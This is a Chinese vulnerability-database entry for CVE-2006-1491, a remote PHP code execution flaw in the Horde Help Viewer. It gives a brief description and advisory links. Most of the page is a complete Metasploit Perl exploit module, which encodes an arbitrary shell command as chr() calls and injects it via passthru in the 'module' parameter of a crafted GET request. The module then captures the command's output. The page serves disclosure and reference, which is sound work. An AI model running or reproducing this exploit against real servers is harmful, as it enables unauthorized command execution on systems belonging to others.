Horde Help Viewer远程PHP代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110038 漏洞类型 代码注入
发布时间 2006-04-10 更新时间 2006-07-19
CVE编号 CVE-2006-1491 CNNVD-ID CNNVD-200603-484
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1660
https://www.securityfocus.com/bid/17292
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-484
|漏洞详情
Horde是个以PHP为基础的架构,用来创建网络应用程式。HordeWebmail应用处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。由于HordeHelpViewer模块代码实现上的问题,远程攻击者可以直接在CGI参数中注入PHP代码在服务器上执行。
|漏洞EXP
##
#        Title: Horde <= 3.0.9, 3.1.0 (Help Viewer) Remote PHP Code Execution Vulnerability
#    Name: horde_help_module.pm
# License: Artistic/BSD/GPL
#         Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
#
## Coded by Inkubus <inkubus@inbox.lv>

package Msf::Exploit::horde_help_module;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
	'Name'     => 'Horde help viewer module remote PHP code execution',
	'Version'  => '$Revision: 1.0 $',
	'Authors'  => [ 'inkubus < inkubus [at] inbox.lv >' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 0,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'RPATH' => [1, 'DATA', 'Path to the Horde help module', '/horde/services/help/'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
			This module exploits an arbitrary PHP code execution flaw in the Horde web
		mail software. This vulnerability is only present in the "Help Viewer Module".
		Horde versions 3.0 up to 3.0.9 and 3.1.0 are vulnerable.
}),

	'Refs' =>
	  [
		['OSVDB', '15945'],
		['CVE',   '2006-1491'],
	  ],

	'Payload' =>
	  {
		'Space' => 512,
		'Keys'  => ['cmd', 'cmd_bash'],
	  },

	'Keys' => ['horde'],

	'DisclosureDate' => 'Mar 28 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $vhost          = $self->GetVar('VHOST') || $target_host;
	my $path           = $self->GetVar('RPATH');
	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

	# Add an echo on each end for easy output capturing
	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

	# Encode the command as a set of chr() function calls
	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

	# Create the get request data
	#my $data = "?do=page&template={\${passthru($byte)}}";
	my $data = "?show=about&module=;\".passthru($byte);'.";

	my $req =
	  "GET $path$data HTTP/1.1\r\n".
	  "Host: $vhost:$target_port\r\n".
	  "Content-Type: application/html\r\n".
	  "Content-Length: ". length($data)."\r\n".
	  "Connection: Close\r\n".
	  "\r\n";

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Sending the malicious Horde request...");

	$s->Send($req);

	my $results = $s->Recv(-1, 20);
	$s->Close();

	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
		my $out = $1;
		$out =~ s/^\s+|\s+$//gs;
		if ($out) {
			$self->PrintLine('----------------------------------------');
			$self->PrintLine('');
			$self->PrintLine($out);
			$self->PrintLine('');
			$self->PrintLine('----------------------------------------');
		}
	}
	return;
}

1;

# milw0rm.com [2006-04-10]
|受影响的产品
S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 9.3 x86_64 S.u.S.E. Linux Professional 9.3 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 9.3 x86_64
|参考资料

来源:XF
名称:horde-help-viewer-command-execution(25516)
链接:http://xforce.iss.net/xforce/xfdb/25516
来源:BID
名称:17292
链接:http://www.securityfocus.com/bid/17292
来源:VUPEN
名称:ADV-2006-1154
链接:http://www.frsirt.com/english/advisories/2006/1154
来源:SECTRACK
名称:1015841
链接:http://securitytracker.com/id?1015841
来源:lists.horde.org
链接:http://lists.horde.org/archives/announce/2006/000271.html
来源:cvs.horde.org
链接:http://cvs.horde.org/diff.php?f=horde%2Fservices%2Fhelp%2Findex.php&r1=2.85&r2=2.86
来源:SUSE
名称:SUSE-SR:2006:007
链接:http://www.novell.com/linux/security/advisories/2006_07_sr.html
来源:GENTOO
名称:GLSA-200604-02
链接:http://www.gentoo.org/security/en/glsa/glsa-200604-02.xml
来源:DEBIAN
名称:DSA-1034
链接:http://www.debian.org/security/2006/dsa-1034
来源:DEBIAN
名称:DSA-1033
链接:http://www.debian.org/security/2006/dsa-1033
来源:VIM
名称:20060330RecentunspecifiedHordevulnisevalinjection
链接:http://www.attrition.org/pipermail/vim/2006-March/000671.html
来源:SECUNIA
名称:19692
链接:http://secunia.com/advisories/19692
来源:SECUNIA